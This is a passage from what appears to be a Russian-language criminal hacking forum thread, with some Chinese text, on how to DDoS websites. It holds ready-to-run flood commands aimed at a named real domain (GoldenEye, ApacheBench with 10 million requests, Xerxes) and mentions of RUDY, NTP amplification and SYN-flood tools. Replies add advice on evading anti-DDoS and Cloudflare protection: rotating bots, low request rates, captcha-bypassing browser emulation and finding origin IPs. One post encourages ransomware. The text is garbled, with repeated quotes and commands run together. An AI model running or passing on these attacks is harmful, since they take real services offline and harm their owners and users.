git clone https://github.com/jseidl/GoldenEye.git && cd GoldenEye && ./goldeneye.py https://cb.anabolicshops.me/ -w 2 -s 4 -m get -napt-get install apache2-utils -y && apt-get install python3-pip -y && pip3 install requests pysocks && apt-get install python3-pip -yulimit -n 10000 && ab -n 10000000...какие книги
прежде, чем использовать некоторые инструменты, нужно понимать, как они работают и зачем они нужны. в твоём случае - сначала нужно определиться, какую атаку использовать против какой цели.Я бы использовал некоторые инструменты
Я использую RUDY для тестирования сервера Microsoft IIS7 с использованием переадресации портов во внешнюю сеть. Это http.На адресной странице есть окно для ввода аккаунта и пароля, соответствующее стандартам RUDY-атак. После нескольких секунд непрерывных атак сервер вышел из строя. Но я использовал тот же метод для атаки на другой адрес домена (похожий на https://diofsif123.xyz). На странице доменного имени есть окно поиска. Это https, теоретически в случае успешной атаки страница будет недоступна, но RUDY DOS не дает никакого эффекта. Я использовал nslookup+доменное имя и получил неавторитетный ответ. Нужно ли мне знать авторитетный ответ? Или на этом сервере есть дополнительные меры безопасности?сначала
google:// "сети для самых маленьких" / "computer networking for dummies"
google:// "какие бывают виды DDOS атак"
google:// "какая разница между layer-4 и layer-7 DDOS атаками"
а потом приходи с более конкретными вопросами, если что-то будет непонятно.
прежде, чем использовать некоторые инструменты, нужно понимать, как они работают и зачем они нужны. в твоём случае - сначала нужно определиться, какую атаку использовать против какой цели.
у сайта может быть настроен anti-ddos.RUDY DOS не дает никакого эффекта
с вероятностью 99.99% это не имеет значения, неавторитетный ответ даст тот же IP адрес, что и авторитетный.Я использовал nslookup+доменное имя и получил неавторитетный ответ. Нужно ли мне знать авторитетный ответ?
Или на этом сервере есть дополнительные меры безопасности?
git clone https://github.com/jseidl/GoldenEye.git && cd GoldenEye && ./goldeneye.py https://cb.anabolicshops.me/ -w 2 -s 4 -m get -napt-get install apache2-utils -y && apt-get install python3-pip -y && pip3 install requests pysocks && apt-get install python3-pip -yulimit -n 10000 && ab -n 10000000 -c 1000 -k -r -l -s 150 -H "User-Agent: Google Bot" https://cb.anabolicshops.me:443/ulimit -n 10000 && ab -n 10000000 -c 1000 -k -r -l -s 150 -H "Accept-Encoding: gzip, deflate" https://cb.anabolicshops.me:443/index.htmlgit clone https://github.com/ngrock90/xerxes.git && cd xerxes && gcc xerxes.c -o xerxes && ./xerxes cb.anabolicshops.me该站点可能配置了anti-ddos。
有 99.99% 的可能性,这并不重要,非权威响应将给出与权威响应相同的 IP 地址。
google://“DNS的工作原理”
google://“CDN的工作原理”
google://“为什么一个网站可以有多个IP地址”
google://“当我在浏览器中输入网站地址并按回车时会发生什么”
google://“如何使用 WHOIS”

/threads/80972/post-560421но атака, похоже, не работает, может быть, я делаю что-то неправильно?
можно отправлять TCP флуд через бесплатные SOCKS прокси или HTTP флуд через HTTP прокси.Есть ли способ атаковать транспортный уровень? Я могу думать только об использовании hping3 для отправки SYN-флуда на цель, но у меня нет ботнета, поэтому цель не будет серьезно затронута.
Я попробовал этот инструмент https://github.com/DrizzleRisk/NTPDoser. Принцип заключается в том, что атакующая машина обманывает сервер синхронизации времени (NTP), и сервер синхронизации времени возвращает большой объем данных на целевой сервер, вызывая целевая система выйдет из строя. Я попробовал это, нашел доменные имена NTP-серверов и использовал их здесь https://support.ntp.org/Servers/NTPPoolServers, но атака, похоже, не работает, может быть, я делаю что-то неправильно? Либо цель не открыла порт 123 udp и не может быть атакована.
hping (hping3) - это не рабочее дерьмо. Забудь и не трать на этот кал время.Я могу думать только об использовании hping3 для отправки SYN-флуда на цель
4 года назад юзал вот это. И оно работало, чьёрт пабьери. Проблема с ботами была только, точнее с их количеством. Ебашило даже через StormWall. Потом я забил на это, а сейчас смотрю, проект развивается, добавили новые методы. Советую попробовать, но сначала изучи полностью инструкцию не спеша. Напиши сюда сколько ботов находит.у меня нет ботнета
Slow атака не на все сервера действует, а только на уязвимые к данной атаке. Можно проверить перед запуском на уязвимость скриптом и nmap´ом. Не помню команду наизусть, но на ютубе было видео на английском, можешь поискать.Что лучше: использовать медленную атаку или усиленную атаку?
При атаках амплификации, нужны, во-первых специальные сервера, которые поддерживают атаки с усилением. Во-вторых - внушительный список уязвимых ip aдресов, в-третьих надо внимательно работать с портами, ничего не напутав...но атака, похоже, не работает, может быть, я делаю что-то неправильно?
То чувство когда ддос нужен для рансомаКороче забей член на эту головную боль и лучше займись рансомом )))


P.S не мне конечно)И некоторые меры противодействия сейчас тоже пробуют реализовывать на нейросетях. И тем не менее, залог успешной L7 атаки:Классификация DDoS-атак на основе нейросетевой модели
Полная эмуляция браузера с возможностью детектировать различные JS челленджи и обходить капчу.
Теория хороша, безусловно. Но как это осуществить своими силами на практике обычным юзверям?
- Массовость, чем больше атакующих IP тем лучше. В идеале это десятки и сотни тысяч, которые при этом обновляются постоянно, и заменяют отвалившиеся прокси/ботов.
- Низкий рейт. Например, когда с каждого атакующего IP идет 1 запрос с интервалом 3~10 секунд.
- Не долбить в один линк. Парсить сайт и ходить по нему, каждый новый запрос с каждого IP должен быть на новую страницу, которую бот не посещал при предыдущих 15~20 запросах.
- Полная эмуляция браузера с возможностью детектировать различные JS челленджи и обходить капчу.
- Боты должны заходить на сайт постепенно, а не сразу всем количеством. Чем больше ботов, тем на бóльший срок надо растягивать их заход на сайт, дабы не триггерить антидудосилку.
- В идеале найти какой-то уязвимый эндпоинт, который дико тормозит (нагружает) атакуемый сервер при обращении к нему с какими-либо специфичными параметрами/пейлоадом и во время основной атаки поддавать на него слегка, несколько раз в 1~3 минуты
Подразумевается эмуляция хромиума (пупитер, селениум). SYN/UDP (L4) флуд это отдельная история, гораздо более геморройная чем L7.Т.е. полностью эмулировать создание TLS-сессии? Насколько я знаю простой флуд SYN-пакетами сейчас довольно успешно фильтруют при помощи eBPF и специальных "умных" сетевых карт.
Учиться кодить, либо заказывать софт за $, либо покупать готовые решения. Со вторым и третьим вариантом сейчас крайне печальная ситуация на рынке.Теория хороша, безусловно. Но как это осуществить своими силами на практике обычным юзверям?
Можете обьяснить, как задидосить сайт с CloudFlare?
- Массовость, чем больше атакующих IP тем лучше. В идеале это десятки и сотни тысяч, которые при этом обновляются постоянно, и заменяют отвалившиеся прокси/ботов.
- Низкий рейт. Например, когда с каждого атакующего IP идет 1 запрос с интервалом 3~10 секунд.
- Не долбить в один линк. Парсить сайт и ходить по нему, каждый новый запрос с каждого IP должен быть на новую страницу, которую бот не посещал при предыдущих 15~20 запросах.
- Полная эмуляция браузера с возможностью детектировать различные JS челленджи и обходить капчу.
- Боты должны заходить на сайт постепенно, а не сразу всем количеством. Чем больше ботов, тем на бóльший срок надо растягивать их заход на сайт, дабы не триггерить антидудосилку.
- В идеале найти какой-то уязвимый эндпоинт, который дико тормозит (нагружает) атакуемый сервер при обращении к нему с какими-либо специфичными параметрами/пейлоадом и во время основной атаки поддавать на него слегка, несколько раз в 1~3 минуты.
Еще можно искать IP бэкенда и бить в него напрямую. Один из методов описывал здесь: https://xss.pro/threads/82843/post-583305 и вот еще неплохая статья: https://infosecwriteups.com/finding-the-origin-ip-behind-cdns-37cd18d5275Учиться кодить, либо заказывать софт за $, либо покупать готовые решения. Со вторым и третьим вариантом сейчас крайне печальная ситуация на рынке.
Цена у всех разная всегда, и складывается она обычно исходя из этого:И почему цена именно такая, как вы укaзали.
Ни каких ноу-хау, большинство информации о дудосе, поиске бэкендов, L7 пентесте давно в паблике. Просто надо практиковаться, искать инфу и изучать. Возможно я что-то забыл или упустил, потом дополню.Если это ваш ноу-хaу